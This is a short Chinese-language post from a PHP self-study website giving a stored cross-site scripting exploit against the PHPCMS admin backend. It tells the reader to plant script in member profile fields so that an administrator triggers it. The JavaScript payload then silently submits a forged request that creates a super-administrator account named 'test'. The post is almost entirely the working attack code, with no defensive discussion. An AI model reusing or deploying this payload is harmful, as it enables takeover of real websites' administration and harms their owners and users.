来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 再会员中心随处修改资料,写入xss代码。诱发管理后台点击? 1 2 3...
|
再会员中心随处修改资料,写入xss代码。诱发管理后台点击
function ajax(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
var _x = ajax();
adduser();
function adduser() {
src="admin.php?mod=phpcms&file=admin&action=add"; data="admin%5Busername%5D=test&admin%5Balloweditpassword%5D=1&roleids%5B%5D=1&admin%5Bdisabled%5D=0&dosubmit=+%C8%B7%B6%A8+";
xhr_act("POST",src,data);
}
function xhr_act(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
_x.send(_a);
return _x.responseText;
后台会自动加一个用户test的超级管理员 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
